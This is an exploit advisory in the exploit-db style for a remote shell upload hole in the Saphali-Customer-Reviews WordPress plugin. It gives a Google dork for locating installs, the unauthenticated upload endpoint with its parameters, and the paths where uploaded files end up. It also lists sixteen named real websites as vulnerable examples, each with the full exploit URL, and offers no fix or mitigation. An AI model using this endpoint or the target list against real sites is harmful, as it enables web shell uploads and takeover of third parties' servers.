WordPress Saphali-Customer-Reviews Plugins 5.0.2 Shell Upl

1. #################################################################################################
2.  
3. # Exploit Title : WordPress Saphali-Customer-Reviews Plugins 5.0.2 Remote Shell Upload Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 22/12/2018
6. # Vendor Homepage : wordpress.org ~ saphali.com
7. # Software Download Link : saphali.com/wordpress-plugin-reviews
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Version Information : 1.0.1 ~ 3.6.1 ~ 4.5.3 ~ 4.1.1 ~ 4.9.8 ~ 4.9.9 ~ 5.0.1 ~ 5.0.2
11. # Exploit Risk : Medium
12. # Google Dorks : inurl:''/wp-content/plugins/saphali-customer-reviews/''
13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
14. + CWE-434- [ Unrestricted Upload of File with Dangerous Type ]
15.  
16. #################################################################################################
17.  
18. # Admin Panel Login Path :
19.  
20. /wp-login.php
21.  
22. # Exploit :
23.  
24. /wp-content/plugins/saphali-customer-reviews/upload/index.php
25.  
26. /wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
27.  
28. # Directory File Path :
29.  
30. /wp-content/plugins/saphali-customer-reviews/images/......
31.  
32. /wp-content/uploads/.....
33.  
34. /wp-content/uploads/[YEAR]/[MONTH]/......
35.  
36. #################################################################################################
37.  
38. # Example Vulnerable Sites =>
39.  
40. [+] bobakery.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
41.  
42. [+] originoil.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
43.  
44. [+] eraglonass.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
45.  
46. [+] lcc.biz.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
47.  
48. [+] teaonline.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
49.  
50. [+] drozdpcp.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
51.  
52. [+] podarkinovogodnie.by/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
53.  
54. [+] taxi-duet.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
55.  
56. [+] vedma-privorot.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
57.  
58. [+] araprint.com.ua/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
59.  
60. [+] bestgarant.biz/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
61.  
62. [+] savitarufa.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
63.  
64. [+] vrukzak.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
65.  
66. [+] royal-events.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
67.  
68. [+] trenhard.com/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
69.  
70. [+] rumba-habana.ru/wp-content/plugins/saphali-customer-reviews/upload/index.php?img=foto&nonce=mktnonce
71.  
72. #################################################################################################
73.  
74. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
75.  
76. #################################################################################################